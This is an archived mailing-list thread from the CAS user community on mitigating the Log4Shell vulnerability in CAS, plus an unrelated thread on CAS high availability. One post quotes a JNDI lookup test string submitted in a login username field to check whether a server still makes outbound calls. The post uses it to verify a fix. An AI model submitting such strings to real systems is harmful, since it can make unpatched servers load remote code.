RE: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

[King, Robert]

Just rolled out this mitigation to our servers, seems to be effective for CAS 
6.3.x builds.

Our environment for reference:

- Standalone Tomcat
- OpenJDK
- CAS and CAS-Management as deployed jars
- CAS and CAS-Mangement built from cas-overlay and cas-management-overlay repos.

Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat startup 
in systemd tomcat.service file.


From: 'Richard Frovarp' via CAS Community 
Sent: Friday, December 10, 2021 3:29 PM
To: cas-user@apereo.org
Subject: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

Maybe? The one that I've seen
https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to your 
JVM and not in the config file.

On 12/10/21 12:55 PM, Mike Osterman wrote:
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in the 
log4j2.xml config file might do to trick.

I'm guessing we'd do that somewhere here at the top?





/etc/cas/logs



On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community 
mailto:cas-user@apereo.org>> wrote:
Using a new enough version of the JDK might also alleviate it? The other option 
is to throw the config option at the JDK to stop it from happening. That would 
seem to be easiest.

On 12/10/21 12:36 PM, King, Robert wrote:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from the jar files:

zip –q –d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set “log4jVersion=2.15.0”
--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca.


--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu.
--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com.


--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu.

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to 

Re: [cas-user] log4j vulnerability

[Adam Franco]

I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped 
outgoing connections when a line like 
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than 
www.example.com).

We were able to verify this fix with tcpdump on the CAS node as well as 
border-firewall logging.
On Friday, December 10, 2021 at 1:59:00 PM UTC-5 richard.frovarp wrote:

> Maybe? The one that I've seen
> https://logging.apache.org/log4j/2.x/security.html
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
> your JVM and not in the config file.
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in 
> the log4j2.xml config file might do to trick. 
>
> I'm guessing we'd do that somewhere here at the top?
>
> 
> 
> 
> 
> /etc/cas/logs
> 
> 
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> cas-...@apereo.org> wrote:
>
>> Using a new enough version of the JDK might also alleviate it? The other 
>> option is to throw the config option at the JDK to stop it from happening. 
>> That would seem to be easiest.
>>
>> On 12/10/21 12:36 PM, King, Robert wrote:
>>
>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>>
>>  
>>
>> Has anyone attempted to mitigate this CVE yet?
>>
>>  
>>
>> There seems to be two possible approaches to mitigation:
>>
>>  
>>
>> 1 The sledgehammer approach of removing the JndiLookup.class from the jar 
>> files:
>>
>>  
>>
>> zip –q –d log4j-core-*.jar 
>> org/apache/logging/log4j/core/lookup/JndiLookup.class
>>
>>  
>>
>> 2. Rebuild CAS and set “log4jVersion=2.15.0”
>> -- 
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> --- 
>> You received this message because you are subscribed to the Google Groups 
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to cas-user+u...@apereo.org.
>> To view this discussion on the web visit 
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca
>>  
>> 
>> .
>>
>>
>> -- 
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> --- 
>> You received this message because you are subscribed to the Google Groups 
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to cas-user+u...@apereo.org.
>> To view this discussion on the web visit 
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu
>>  
>> 
>> .
>>
> -- 
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> --- 
> You received this message because you are subscribed to the Google Groups 
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to cas-user+u...@apereo.org.
>
> To view this discussion on the web visit 
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com
>  
> 
> .
>
>
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/37170aad-78c6-4d0d-97d3-834030f0f6bcn%40apereo.org.

Re: [cas-user] log4j vulnerability

['Richard Frovarp' via CAS Community]

Maybe? The one that I've seen
https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
your JVM and not in the config file.


On 12/10/21 12:55 PM, Mike Osterman wrote:
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in 
the log4j2.xml config file might do to trick.


I'm guessing we'd do that somewhere here at the top?




    
        /etc/cas/logs
    
    

On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community 
mailto:cas-user@apereo.org>> wrote:


Using a new enough version of the JDK might also alleviate it? The
other option is to throw the config option at the JDK to stop it
from happening. That would seem to be easiest.

On 12/10/21 12:36 PM, King, Robert wrote:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228


Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from
the jar files:

zip –q –d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set “log4jVersion=2.15.0”

-- 
- Website: https://apereo.github.io/cas


- Gitter Chatroom: https://gitter.im/apereo/cas

- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the
Google Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it,
send an email to cas-user+unsubscr...@apereo.org
.
To view this discussion on the web visit

https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca

.



-- 
- Website: https://apereo.github.io/cas 

- Gitter Chatroom: https://gitter.im/apereo/cas

- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the Google
Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it,
send an email to cas-user+unsubscr...@apereo.org
.
To view this discussion on the web visit

https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu

.

--
- Website: https://apereo.github.io/cas 
- Gitter Chatroom: https://gitter.im/apereo/cas 


- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the Google 
Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it, send 
an email to cas-user+unsubscr...@apereo.org 
.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com 
.



--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS Community" group.

To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu.

Re: [cas-user] log4j vulnerability

[Mike Osterman]

Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
the log4j2.xml config file might do to trick.

I'm guessing we'd do that somewhere here at the top?





/etc/cas/logs



On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
cas-user@apereo.org> wrote:

> Using a new enough version of the JDK might also alleviate it? The other
> option is to throw the config option at the JDK to stop it from happening.
> That would seem to be easiest.
>
> On 12/10/21 12:36 PM, King, Robert wrote:
>
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>
>
>
> Has anyone attempted to mitigate this CVE yet?
>
>
>
> There seems to be two possible approaches to mitigation:
>
>
>
> 1 The sledgehammer approach of removing the JndiLookup.class from the jar
> files:
>
>
>
> zip –q –d log4j-core-*.jar
> org/apache/logging/log4j/core/lookup/JndiLookup.class
>
>
>
> 2. Rebuild CAS and set “log4jVersion=2.15.0”
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca
> 
> .
>
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu
> 
> .
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com.

Re: [cas-user] log4j vulnerability

['Richard Frovarp' via CAS Community]

Using a new enough version of the JDK might also alleviate it? The other 
option is to throw the config option at the JDK to stop it from 
happening. That would seem to be easiest.


On 12/10/21 12:36 PM, King, Robert wrote:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from the 
jar files:


zip –q –d log4j-core-*.jar 
org/apache/logging/log4j/core/lookup/JndiLookup.class


2. Rebuild CAS and set “log4jVersion=2.15.0”

--
- Website: https://apereo.github.io/cas 
- Gitter Chatroom: https://gitter.im/apereo/cas 


- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the Google 
Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it, send 
an email to cas-user+unsubscr...@apereo.org 
.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca 
.



--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS Community" group.

To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu.

[cas-user] log4j2 vulnerability

[Manuel Cones]

Hello, due the recent discovered log4j2 vulnerability, whats the way to 
mitigate it?


should i add log4j2.formatMsgNoLookups=true to the cas.properties file?

Thanks in Advance,
Manuel.

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/ae1c7b48-1c3e-4c3c-b762-f5a8e5794df9n%40apereo.org.

[cas-user] log4j vulnerability

[King, Robert]

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from the jar files:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set "log4jVersion=2.15.0"

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca.

Re: [cas-user] CAS High Availability

[Ray Bon]

Baba,

We use round robin with 4 cas servers and use hazelcast for ticket storage. 
Round robin is managed by the load balancer in prod.
Whatever you use for ticket storage has to be fast enough so that the second 
server knows about the tickets before they are validated by the services.
On my local I use apache config for clustering (this config will work with only 
one of the cas servers started).



# BalancerMember http://localhost:8087
BalancerMember ajp://localhost:8010
BalancerMember ajp://localhost:8011

DocumentRoot "/var/www/html"


SSLEngine on
SSLCertificateFile  /etc/ssl/certs/local.uvic.ca.chain.pem
SSLCertificateKeyFile /etc/ssl/private/local.uvic.ca.key.pem

SSLProxyEngine on
#Bypassing certicate checking on self-signed client cert
SSLProxyVerify none
SSLProxyCheckPeerCN off
SSLProxyCheckPeerName off
SSLProxyCheckPeerExpire off

ProxyPreserveHost On
ProxyPass /cas balancer://cascluster/cas
ProxyPassReverse /cas balancer://cascluster/cas
#ProxyPass /cas ajp://localhost:8010/cas
#ProxyPassReverse /cas ajp://localhost:8010/cas
ProxyPass /cas-management ajp://localhost:8017/cas-management
ProxyPassReverse /cas-management ajp://localhost:8017/cas-management
ProxyPass /sp ajp://localhost:8016/sp
ProxyPassReverse /sp ajp://localhost:8016/sp
ProxyPass /app0 http://localhost:12080/app0
ProxyPassReverse /app0 http://localhost:12080/app0
ProxyPass /app1 http://localhost:12080/app1
ProxyPassReverse /app1 http://localhost:12080/app1
ProxyPass /Shibboleth.sso http://localhost:12080/Shibboleth.sso
ProxyPassReverse /Shibboleth.sso http://localhost:12080/Shibboleth.sso
ProxyPass /nodejs https://localhost:8443
ProxyPassReverse /nodejs https://localhost:8443
ServerName local.uvic.ca


RequestHeader set X-HTTPS 1
Header set Referrer-Policy "no-referrer-when-downgrade"




Ray

On Fri, 2021-12-10 at 03:57 -0800, Baba Ndiaye wrote:
Notice: This message was sent from outside the University of Victoria email 
system. Please be cautious with links and sensitive information.

I want to set up a high availability solution for my CAS servers and i want 
some solutions for that i want to use DNS round Robin
*cluster (cas1.myorganisation.edu cas2.myorganisation.edu)
*DNS round robin
If you already implement it i need your help please.

--

Ray Bon
Programmer Analyst
Development Services, University Systems
2507218831 | CLE 019 | r...@uvic.ca

I acknowledge and respect the lək̓ʷəŋən peoples on whose traditional territory 
the university stands, and the Songhees, Esquimalt and WSÁNEĆ peoples whose 
historical relationships with the land continue to this day.

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/5d9d0256b4b73788ab1fee8a3bcda3476618eedd.camel%40uvic.ca.

[cas-user] CAS High Availability

[Baba Ndiaye]

I want to set up a high availability solution for my CAS servers and i want 
some solutions for that i want to use DNS round Robin
*cluster (cas1.myorganisation.edu cas2.myorganisation.edu)
*DNS round robin
If you already implement it i need your help please.

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/45e6a2a5-ef55-4e1b-b1d3-9860fd29eb46n%40apereo.org.